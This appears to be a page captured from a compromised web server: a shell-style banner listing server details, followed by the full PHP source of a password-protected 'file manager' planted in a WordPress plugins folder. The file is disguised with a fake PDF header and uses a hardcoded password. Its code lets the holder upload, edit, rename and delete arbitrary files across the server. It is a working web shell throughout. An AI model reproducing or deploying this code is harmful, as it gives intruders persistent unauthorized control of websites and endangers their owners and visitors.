HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux WebLive 5.15.0-79-generic #86-Ubuntu SMP Mon Jul 10 16:07:21 UTC 2023 x86_64
User: ubuntu (1000)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/html/wpprm/wp-content/plugins/server.php
<!-- %PDF-1.5 -->
<?php
// filemanager.php - Tailwind File Manager with Auth & Status Messages

session_start();
$auth_password = 'merdeka123'; // Ganti dengan password kamu
$status = '';
$status_class = '';

if (!isset($_SESSION['auth'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['password'] === $auth_password) {
        $_SESSION['auth'] = true;
    } else {
        echo '<!DOCTYPE html><html><head><title>Login</title><link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet"></head><body class="bg-gray-100 flex items-center justify-center h-screen">
        <form method="post" class="bg-white shadow-md rounded px-8 pt-6 pb-8 mb-4">
            <h2 class="mb-4 text-xl font-bold">Login File Manager</h2>
            <input type="password" name="password" placeholder="Password" class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 mb-3">
            <button class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded">Login</button>
        </form></body></html>';
        exit;
    }
}

$path = isset($_GET['path']) ? realpath($_GET['path']) : getcwd();
if (!$path || !is_dir($path)) $path = getcwd();
$files = scandir($path);

function h($str) {
    return htmlspecialchars($str, ENT_QUOTES, 'UTF-8');
}

function full_path($base, $file) {
    return rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $file;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $action = $_POST['action'] ?? '';
    $current = realpath($_POST['current'] ?? getcwd());

    switch ($action) {
        case 'upload':
            if (isset($_FILES['file'])) {
                $success = move_uploaded_file($_FILES['file']['tmp_name'], full_path($current, $_FILES['file']['name']));
                $status = $success ? 'File berhasil di-upload.' : 'Gagal upload file.';
                $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            }
            break;
        case 'newfile':
            $success = file_put_contents(full_path($current, $_POST['name']), '') !== false;
            $status = $success ? 'File berhasil dibuat.' : 'Gagal membuat file.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'newfolder':
            $success = mkdir(full_path($current, $_POST['name']));
            $status = $success ? 'Folder berhasil dibuat.' : 'Gagal membuat folder.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'delete':
            $target = full_path($current, $_POST['name']);
            $success = false;
            if (is_file($target)) $success = unlink($target);
            if (is_dir($target)) $success = rmdir($target);
            $status = $success ? 'Berhasil menghapus.' : 'Gagal menghapus.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'rename':
            $success = rename(full_path($current, $_POST['old']), full_path($current, $_POST['new']));
            $status = $success ? 'Berhasil rename.' : 'Gagal rename.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'save':
            $success = file_put_contents(full_path($current, $_POST['name']), $_POST['content']) !== false;
            $status = $success ? 'Perubahan berhasil disimpan.' : 'Gagal menyimpan file.';
            $status_class = $success ? 'bg-green-100 text-green-700' : 'bg-red-100 text-red-700';
            break;
        case 'chdir':
            header("Location: ?path=" . urlencode(realpath(full_path($current, $_POST['name']))));
            exit;
    }
    header("Location: ?path=" . urlencode($current) . "&status=" . urlencode($status) . "&class=" . urlencode($status_class));
    exit;
}

$editing = isset($_GET['edit']) ? $_GET['edit'] : null;
if (isset($_GET['status'])) {
    $status = $_GET['status'];
    $status_class = $_GET['class'] ?? 'bg-blue-100 text-blue-700';
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>File Manager</title>
  <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
</head>
<body class="bg-gray-100 p-6">
  <div class="max-w-6xl mx-auto bg-white p-6 rounded shadow">
    <h1 class="text-2xl font-bold mb-4">Mini File Manager</h1>
    <p class="mb-2"><strong>Current Path:</strong> <?= h($path) ?></p>
    <div class="mb-4 text-sm text-blue-600">
      <?php
        $parts = explode(DIRECTORY_SEPARATOR, $path);
        $cumulative = "";
        foreach ($parts as $i => $part):
          if ($part === '') continue;
          $cumulative .= DIRECTORY_SEPARATOR . $part;
          echo '<a href="?path=' . urlencode($cumulative) . '" class="hover:underline">' . h($part) . '</a>/';
        endforeach;
      ?>
    </div>

    <?php if ($status): ?>
      <div class="mb-4 p-2 rounded <?= h($status_class) ?>">
        <?= h($status) ?>
      </div>
    <?php endif; ?>

    <div class="flex flex-wrap gap-4 mb-6">
      <form method="post" enctype="multipart/form-data" class="flex gap-2 items-center">
        <input type="hidden" name="action" value="upload">
        <input type="hidden" name="current" value="<?= h($path) ?>">
        <input type="file" name="file" class="text-sm">
        <button class="bg-blue-500 text-white px-4 py-1 rounded">Upload</button>
      </form>

      <form method="post" class="flex gap-2 items-center">
        <input type="hidden" name="action" value="newfile">
        <input type="hidden" name="current" value="<?= h($path) ?>">
        <input type="text" name="name" placeholder="New file" class="border p-1 rounded">
        <button class="bg-green-500 text-white px-4 py-1 rounded">New File</button>
      </form>

      <form method="post" class="flex gap-2 items-center">
        <input type="hidden" name="action" value="newfolder">
        <input type="hidden" name="current" value="<?= h($path) ?>">
        <input type="text" name="name" placeholder="New folder" class="border p-1 rounded">
        <button class="bg-yellow-500 text-white px-4 py-1 rounded">New Folder</button>
      </form>
    </div>

    <table class="w-full table-auto text-sm">
      <thead class="bg-gray-200">
        <tr><th class="text-left px-2 py-1">Name</th><th class="text-left px-2 py-1">Type</th><th class="text-left px-2 py-1">Actions</th></tr>
      </thead>
      <tbody>
        <?php foreach ($files as $f): 
          if ($f === '.') continue;
          $fp = full_path($path, $f);
        ?>
        <tr class="border-t">
          <td class="px-2 py-1">
            <?php if (is_dir($fp)): ?>
              <form method="post" class="inline">
                <input type="hidden" name="action" value="chdir">
                <input type="hidden" name="current" value="<?= h($path) ?>">
                <input type="hidden" name="name" value="<?= h($f) ?>">
                <button class="text-blue-600 hover:underline">📁 <?= h($f) ?></button>
              </form>
            <?php else: ?>
              <a href="?path=<?= urlencode($path) ?>&edit=<?= urlencode($f) ?>" class="text-gray-800 hover:underline">📄 <?= h($f) ?></a>
            <?php endif; ?>
          </td>
          <td class="px-2 py-1"><?= is_dir($fp) ? 'Folder' : 'File' ?></td>
          <td class="px-2 py-1">
            <div class="flex gap-2">
              <form method="post" class="inline">
                <input type="hidden" name="action" value="delete">
                <input type="hidden" name="current" value="<?= h($path) ?>">
                <input type="hidden" name="name" value="<?= h($f) ?>">
                <button class="bg-red-100 text-red-700 px-2 py-1 rounded text-xs" onclick="return confirm('Delete <?= h($f) ?>?')">Delete</button>
              </form>
              <form method="post" class="inline flex items-center gap-1">
                <input type="hidden" name="action" value="rename">
                <input type="hidden" name="current" value="<?= h($path) ?>">
                <input type="hidden" name="old" value="<?= h($f) ?>">
                <input type="text" name="new" value="<?= h($f) ?>" class="border px-1 py-0.5 text-xs rounded">
                <button class="bg-green-100 text-green-700 px-2 py-1 rounded text-xs">Rename</button>
              </form>
            </div>
          </td>
        </tr>
        <?php endforeach; ?>
      </tbody>
    </table>

    <?php if ($editing): 
      $edit_path = full_path($path, $editing);
      if (is_file($edit_path)): ?>
      <div class="mt-6">
        <h2 class="text-lg font-semibold mb-2">Editing: <?= h($editing) ?></h2>
        <form method="post">
          <input type="hidden" name="action" value="save">
          <input type="hidden" name="current" value="<?= h($path) ?>">
          <input type="hidden" name="name" value="<?= h($editing) ?>">
          <textarea name="content" class="w-full h-80 border p-2 font-mono text-sm"><?= h(file_get_contents($edit_path)) ?></textarea>
          <button class="mt-2 bg-blue-600 text-white px-4 py-1 rounded">Save</button>
        </form>
      </div>
    <?php endif; endif; ?>
  </div>
</body>
</html>